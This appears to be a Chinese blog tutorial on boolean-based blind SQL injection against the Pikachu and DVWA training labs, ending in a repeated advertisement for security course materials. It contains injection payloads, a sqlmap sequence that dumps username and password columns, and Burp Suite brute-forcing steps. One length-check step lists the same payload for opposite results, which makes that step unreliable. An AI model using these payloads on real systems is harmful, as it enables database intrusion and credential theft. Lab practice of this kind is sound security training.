文章目录
布尔型(boolean)盲注
页面不会返回数据库的内容,所以不能使用联合查询将敏感信息显示在页面上,但是可以通过构造SQL语句来获取数据。
输入 SQL 注入检测语句 判断页面是否不一样,如果不一样大概会存在 SQL 注 入漏洞 1’and ‘1’='1 一样 1’and ‘1’='2 不一样,如果输入检测语句页面没有任何改 变可以使用延时语句进行检测 1’and sleep(10)–+ 函数 sleep() 在 mysql 是延时 返回的意思 以秒为单位 sleep(10) 即延时 10 秒执行
用SQLMap爆破
查询是否存在sqlmap已知的漏洞
sqlmap -u"url" -batch
获取所有的数据库
sqlmap -u"url" --dbs -batch
获取数据库的表名
sqlmap -u"url" -D pikachu --tables -batch
获取对应数据库表中的字段名
sqlmap -u"url" -D pikachu -T member --columns -batch
获取字段的内容
sqlmap -u"url" -D pikachu -T member -C id,username,pw --dump -batch
手工爆破
布尔型盲注入查询长度
要查询当前库名,首先确定要查询数据库的长度,再通过截取字符进行对比
返回正常界面
vince' and length(database())>=7#
返回错误界面
vince' and length(database())>=7#
综上可知数据库长度为7
布尔型盲注入获取数据库名
数据库常用字符如下:
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. @_
将这些字符和数据库中的每一个字符进行比较得到最终的数据库名
获取数据库第一个字符,输入vince' and if(substring(database(),1,1)='p',1,0)
(后续需要一个个爆破较为麻烦,所以建议用burpsuite来进行爆破)
用bp来判断数据库长度
添加变量
语句:vince' and length(database())>=2#
开始攻击
获取数据库名
添加变量
kobe' and (select substr(database(),1,1))='k'#
爆破数据库
获取表的长度
输入kobe' and length((select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu' )) = 1 #
(个人能力有限,手工注入未能实现,但在dvwa靶场能够成功完成,待后续补充)
DVWA靶场实验:
查询数据库长度
1' and if(length(database())=4,1,0)#
获取数据库名
数据库常用字符如下:
0123456789ABCDEFGHIJKLMNOPQRSTU
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!*
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!